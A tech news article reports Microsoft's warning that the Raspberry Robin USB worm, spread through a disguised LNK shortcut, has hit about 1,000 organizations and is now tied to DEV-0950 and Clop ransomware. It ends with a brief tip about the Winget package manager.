Microsoft Security has published a warning to businesses that a new Raspberry Robin USB drive worm. According to the advisory, the worm has affected nearly 1,000 organizations and 3,000 devices over the last month.
It is worth noting that the Raspberry Robin worm is not new. It has already been seen deploying Lockbit ransomware, and malware such as Truebot and Bumblebee.In fact, I reported in May how it was being used to attack Windows systems.
Microsoft’s warning suggests the worm is now being leveraged in Clop ransomware attacks.
According to Microsoft Security, it is tracking a group known as DEV-0950 as the perpetrator of the latest attacks.
“DEV-0950 traditionally uses phishing to acquire the majority of their victims, so this notable shift to using Raspberry Robin enables them to deliver payloads to existing infections and move their campaigns more quickly to ransomware stages,” says the Microsoft Security Threat Intelligence Center (MSTIC).
Raspberry Robin was first found in September 2021 by security research firm Red Canary. It is installed on Windows machines through a USB drive. That drive holds a LNK shortcut file that looks like a regular folder.
Attack Potential
While potentially devastating, for an attack to be successful the victim or attacker must insert the infected USB drive and run it on a Windows machine. Not likely but by no means impossible, as Microsoft Security says there are nearly a thousand examples in the last 30 days.
The company points out Windows disables autorun on USB drives by default. However, the company says many businesses simply enable it later.
“Raspberry Robin’s LNK file points to cmd.exe to launch the Windows Installer service msiexec.exe and install a malicious payload hosted on compromised QNAP network attached storage (NAS) devices,” MSTIC explains.
Tip of the day: Windows now has a package manager similar to Linux called “Winget”. In our tutorial, we show you how to install and use this new tool that allows the quick installation of apps via PowerShell or a GUI.